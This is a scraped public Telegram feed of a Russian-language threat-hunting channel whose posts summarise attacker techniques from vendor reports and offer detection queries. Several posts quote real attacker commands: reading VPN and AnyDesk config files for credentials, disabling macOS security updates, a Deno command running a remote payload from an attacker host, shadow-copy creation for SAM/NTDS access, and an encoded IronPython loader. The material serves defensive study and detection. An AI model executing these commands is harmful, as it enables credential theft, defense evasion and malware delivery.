ChatCrawlerпоиск по публичному Telegram Открыть приложение
K

Know Your Adversary Chat

5 участников
S
id 2385758113Фотография
Последнее время часто встречаю, когда через js файлы стартует очень многоступенчатая доставка ВПО, при чем все переобфусцировано так, что при реверсе голова пухнет)
S
id 2385758113Фотография
Иногда запрещают использовать на рабочих компьютерах много лишнего ПО, только рабочее Если ограничений нет, то сотрудники и игрульки ставят, и всякие приложения для личных целей, а там уже очень и очень много шума и пойди отличи, где ВПО, а где фолз)
I
Фотография
нажмите — покажем
🌚 Core Werewolf меняет клыки: троян CoreRAT в атаках на российские организации С июня по июль 2026 года специалисты BI.ZONE Threat Intelligence зафиксировали активность кластера Core Werewolf. Эксперты выявили, что злоумышленники начали использовать ранее неизвестный троян удаленного доступа CoreRAT. В арсенале Core Werewolf уже встречались самописные мини-бэкдоры, однако CoreRAT — первый известный нам полноценный RAT их собственной разработки. ➡️Подробнее о кампаниях и техниках Core Werewolf 💬 Мы в MAX
2.9K ·
S
I
Фотография
нажмите — покажем
Всем привет! Нередко злоумышленникам удается извлечь аутентификационный материал из файлов, о технике Credentials In Files (T1552.001) мы и поговорим. Так, согласно отчету Kaspersky об активности кластера GOFFEE (Paper Werewolf), злоумышленники проявляли активный интерес к различным конфигурационным файлам, содержащим чувствительные данные, а именно: cmd.exe /c type "%APPDATA%\AnyDesk\service.conf" cmd.exe /c type "%USERPROFILE%\OpenVPN\config\avia\avia.ovpn" cmd.exe /c type "%APPDATA%\Kerio\VpnClient\user.cfg" cmd.exe /c dir "%USERPROFILE%\Downloads\Telegram Desktop" Подобная активность, разумеется, предоставляет нам возможности для проактивного поиска, например: event_type: "processcreatewin" AND proc_file_path: "cmd.exe" AND cmdline: ("type" OR "dir") AND cmdline: ("anydesk" OR "openvpn" OR "vpnclient" OR "telegram desktop") Скоро увидимся! English version
559 ·
I
Фотография
нажмите — покажем
Всем привет! Сегодня взглянем на то, как злоумышленники борются с обновлениями скомпрометированных систем в рамках техники Disable or Modify Tools (T1685). Более того, сегодня у нас в фокусе атаки на macOS. Давайте откроем отчет об активности XCSSET и пролистаем его до секции "Impairing Defenses". Как видите, злоумышленник использует следующие команды для отключения определенных механизмов обновлений безопасности Apple: defaults write /Library/Preferences/com.apple.SoftwareUpdate.plist ConfigDataInstall -bool false defaults write /Library/Preferences/com.apple.SoftwareUpdate.plist AllowRapidSecurityResponses -bool false Первая команда отключает получение обновлений для обновлений XProtect, Gatekeeper и других защитных компонентов, вторая отключает установку Rapid Security Responses (RSR). В данном случае мы можем поискать события модификации файла com.apple.SoftwareUpdate.plist с помощью defaults: event_type: "processcreatemac" AND proc_file_path: "defaults" AND cmdline: "com.apple.SoftwareUpdate.plist" Скоро увидимся! English version
628 ·
I
Фотография
нажмите — покажем
Всем привет! Туннели. Злоумышленники придумывают все новые и новые варианты их реализации. Сегодня мы снова взглянем на технику Protocol Tunneling (T1572). Существует масса бесплатных сервисов туннелирования, которые позволяют сделать локальный сервис доступным из интернета через публичный URL. Например, злоумышленники часто используют Cloudflare Tunnel. А вот согласно этому отчету, атакующие использовали и localhost[.]run. Обнаружить следы его использования можно, например, отслеживая коммуникации с поддоменами lhr[.]life: event_type: dnsreq* AND dns_rname: "lhr.life" Скоро увидимся! English version
599 ·
I
Фотография
нажмите — покажем
Всем привет! Сегодня посмотрим на пример того, как стремление атакующих избавиться от артефактов только добавляет шума. Более того, очень популярный пример. А его источником послужит отчет Zscaler о новом модульном трояне удаленного доступа Abyssos. Несмотря на то, что троян новый, он использует огромное количество хорошо известных техник. Например, в рамках реализации техники File Deletion (T1070.004) ВПО выполняет следующую команду: cmd.exe /C ping 127.0.0.1 -n 3 >nul & del /F /Q путь_к_файлу Несмотря на то, что в данном случае удаляется вредоносный файл, структура команды весьма специфическая, что предоставляет нам возможность для обнаружения: event_type: "processcreatewin" AND proc_file_path: "cmd.exe" AND cmdline: ("ping" AND "del") Более того, это далеко не первый образец, для которого свойственен подобный поведенческий маркер, что позволяет обнаруживать не только данное семейство, но и множество других. Скоро увидимся! English version
567 ·
I
I
I
Фотография
нажмите — покажем
Всем привет! Надеюсь, вы помните, что OFFZONE уже на следующей неделе. Сегодня я хочу немного рассказать вам про зону, за которую я отвечаю - Threat.Zone. Она посвящена исследованию и расследованию реальных кибератак, но в этом году вы услышите и пару интересных докладов, посвященных наступательной безопасности. В этом году спикеры расскажут про неочевидные источники криминалистических артефактов (и даже их злонамеренном использовании), интересных техниках злоумышленников, их многочисленных ошибках, а также о том, как выявить следы компрометации собственной ИТ-инфраструктуры, превратить киберразведданные в измеримую защиту, эффективно использовать ИИ в киберразведке, и о многом другом!. Увидимся 21 августа в GOELRO!
565 ·
I
Фотография
нажмите — покажем
Всем привет! Как вы наверняка знаете, техника Modify Registry (T1112) позволяет атакующим решить самые разные задачи в рамках жизненного цикла атаки. Сегодня мы взглянем на еще один интересный пример. Чтобы обойти имеющиеся средства защиты, вымогатели, на этот раз Akira (Neon Wolf), в очередной раз воспользовались безопасным режимом в Windows. Разумеется, злоумышленникам нужно было как-то управлять скомпрометированной системой. Для этого они использовали AnyDesk, а чтобы он был запущен и после перезагрузки в безопасный режим, они осуществили следующую модификацию реестра: "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AnyDesk /ve /d Service Так как данная активность имеет место непосредственно перед началом распространения программ-вымогателей, это может стать последним шансом недопустить ущерб. Например, стоит обращать внимание на события подозрительной модификации соответствующего раздела реестра: event_type: "registryvaluesetwin" AND reg_key_path: "safeboot" Скоро увидимся! English version
306 ·
I
Фотография
нажмите — покажем
Всем привет! Сегодня поговорим о JavaScript (T1059.007) и о том, как атакующие злоупотребляют легитимной средой его выполнения. В рамках очередной ClickFix-кампании, злоумышленники использовали довольно интересные техники. Во-первых, они использовали winget.exe для загрузки и инсталляции среды выполнения Deno. Во-вторых, использовали Deno для запуска вредоносной нагрузки с удаленного сервера, подконтрольного атакующим: deno.exe run -A hxxp://webstizkgao[.]com/v020def066f14754be9.js Кажется, злонамеренное использование Deno может быть отличной целью для проактивного поиска: event_type: "processcreatewin" AND proc_file_originalfilename: "deno.exe" AND cmdline: "run" Скоро увидимся! English version
209 ·
I
I
Фотография
нажмите — покажем
Всем привет! Надеюсь, вы помните, что сбор информации о скомпрометированной системе - один из самых ценных этапов с точки зрения проактивного поиска. Сегодня мы взглянем на технику System Location Discovery (T1614). Довольно часто ВПО использует различные легитимные веб-сервисы для получения информации об IP-адресе скомпрометированной системы. В данном случае, злоумышленники использовали сразу несколько, а именно: https://ipv4[.]ipleak[.]net/json/ https://get[.]geojs[.]io/v1/ip/geo[.]json https://ipapi[.]co/json/ https://api[.]ipapi[.]is/ https://ipinfo[.]io/json Если какие-то из этих сервисов вам неизвестны, они могут составить основу вашей гипотезы, например: event_type: "dnsreqwin" AND dns_rname: ("ipv4.ipleak.net" OR "get.geojs.io" OR "ipapi.co" OR "api.ipapi.is" OR "ipinfo.io") Скоро увидимся! English version
321 ·
I
Фотография
нажмите — покажем
Всем привет! Сегодня мы поговорим о технике Direct Volume Access (T1006), которая нередко используется злоумышленниками для обхода ограничений доступа к интересующим их файлам, в том числе тем, что содержат учетные данные. Например, атакующие могут получить доступ к теневым копиям. В данном случае злоумышленники осуществили многочисленные попытки дампа Security Account Manager (SAM) и доступа к файлу NTDS.dit, после чего воспользовались утилитой vssadmin для создания теневых копий дисков C:\ и F:\: vssadmin create shadow /for=C: vssadmin create shadow /for=F: Несмотря на то, что такая активность может быть вполне легитимной, выполнение подобных команд может также указывать на попытки злоумышленников получить доступ к файлам, содержащих чувствительную информацию. Следовательно, похожие следы можно поискать проактивно: event_type: "processcreatewin" AND proc_file_path: "vssadmin.exe" AND cmdline: ("create" AND "shadow") Скоро увидимся! English version
526 ·
I
Фотография
нажмите — покажем
Всем привет! Как вы знаете, злоумышленники нередко используют различные интерпретаторы команд и сценариев на различных этапах жизненного цикла атаки. Сегодня мы посмотрим на не самый распространенный пример использования Python (T1059.006). Чтобы сформировать гипотезы для проактивного поиска, заглянем в отчет Zscaler о SloppyRAT. Нас будет интересовать, посвященная Python. Во-первых, атакующие использовали переименованную копию curl.exe для загрузки IronPython с GitHub: "C:\Users\[redacted]\AppData\Local\9342371634011778.com" -s -L --tlsv1.2 --ssl-no-revoke -o "C:\Users\[redacted]\AppData\Local\IronPython.3.4.2.pdf" github.com/IronLanguages/ironpython3/releases/download/v3.4.2/IronPython.3.4.2.zip В данном случае мы можем осуществлять поиск подозрительных загрузок IronPython с помощью cURL: event_type: "processcreatewin" AND proc_file_originalfilename: "curl.exe" AND cmdline: *ironpython* Далее атакующие использовали загруженный интерпретатор для доставки CastleLoader, и далее - CastleRAT: "C:\Users\[redacted]\AppData\Local\IronPython.3.4.2\net462\31706105999761.exe" -c "import base64,zlib,sys,subprocess as s;s.Popen([sys.executable,'-c',zlib.decompress(base64.b64decode('eJytEtLwAUhbMW/A8FF0Bq1aeEirhpeALi4o7qw1ixdbWPLQq/eege/iJVgN4uIjmfuaM2earkVRNBYPYleci4E4Eh1kL7FiTgTU2JvYov4TPtoDfFEzEUu+mJHHIiVscJee/rCvEuUokFPjq69YXLJzv7StZjd/Y70SYe5jxtLl6CncL09xtBzi2fW26c+ITfkPSVX0luQH/FeoDd3M4P2Jzdv7s6x/41ndfSUzHwhluFByjNB828azi+souev/OZ874d8LjPL/NotmDwj+w7y88+6yh72Lkm9AzpuxcM9Q8wlX0n0e')).decode('utf-32'))]" В этот раз можно взглянуть на подозрительные запуски IronPython с декодированием base64: event_type: "processcreatewin" AND proc_file_productname: "ironpython" AND cmdline: "base64.b64decode" В целом, IronPython едва ли будет использоваться среднестатистическим пользователем, следовательно, появление подобного интерпретатора на хосте уже можно считать подозрительным событием. Скоро увидимся! English version
282 ·
Архив по месяцам
Каталог площадок Искать в ChatCrawler

Слепок открытой публичной ленты из поискового индекса ChatCrawler — «Google по публичному Telegram»; обновляется по мере обхода площадки. Время — UTC.

Только публичный контент, официальный API Telegram. О проекте · Вопросы · Чего мы не делаем · Убрать страницу из выдачи · Каталог